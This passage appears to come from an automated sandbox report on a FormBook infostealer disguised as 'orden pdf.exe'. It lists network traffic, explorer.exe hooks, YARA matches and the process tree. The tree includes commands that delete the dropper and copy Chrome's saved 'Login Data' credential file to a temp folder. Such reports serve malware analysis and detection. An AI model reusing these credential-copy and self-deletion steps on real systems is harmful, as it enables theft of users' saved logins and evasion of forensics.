                                            Cache-Control: no-cache
                                            Origin: http://www.hydrabadproperties.com
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://www.hydrabadproperties.com/n7ak/
                                            Accept-Language: en-US
                                            Accept-Encoding: gzip, deflate
                                            Jan 13, 2021 21:14:16.894265890 CET | 10018 | IN | HTTP/1.1 301 Moved Permanently
                                            location: https://www.hydrabadproperties.com/n7ak/
                                            date: Wed, 13 Jan 2021 20:14:16 GMT
                                            content-length: 0
                                            connection: close


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function Name | Hook Type | Active in Processes
                                            PeekMessageA | INLINE | explorer.exe
                                            PeekMessageW | INLINE | explorer.exe
                                            GetMessageW | INLINE | explorer.exe
                                            GetMessageA | INLINE | explorer.exe

                                            Processes

                                            Process: explorer.exe, Module: user32.dll
                                            Function Name | Hook Type | New Data
                                            PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x93 0x37
                                            PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x13 0x37
                                            GetMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x13 0x37
                                            GetMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x93 0x37

                                            Statistics

                                            Behavior

                                            System Behavior

                                            General

                                            Start time:21:11:16
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\orden pdf.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\orden pdf.exe'
                                            Imagebase:0x170000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:21:11:26
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\orden pdf.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\Desktop\orden pdf.exe
                                            Imagebase:0x170000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low

                                            General

                                            Start time:21:11:26
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\orden pdf.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\orden pdf.exe
                                            Imagebase:0x7ff6741d0000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:21:11:29
                                            Start date:13/01/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0x7ff714890000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:11:30
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
                                            Imagebase:0x7ff67eb10000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:11:34
                                            Start date:13/01/2021
                                            Path:C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
                                            Imagebase:0x1370000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 33%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:21:11:53
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\systray.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\systray.exe
                                            Imagebase:0xc90000
                                            File size:9728 bytes
                                            MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:21:11:58
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\orden pdf.exe'
                                            Imagebase:0xbb0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:11:58
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:12:48
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                                            Imagebase:0xbb0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:12:48
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:21:13:02
                                            Start date:13/01/2021
                                            Path:C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
                                            Imagebase:0x13b0000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 33%, ReversingLabs
                                            Reputation:low

                                            Disassembly

                                            Code Analysis
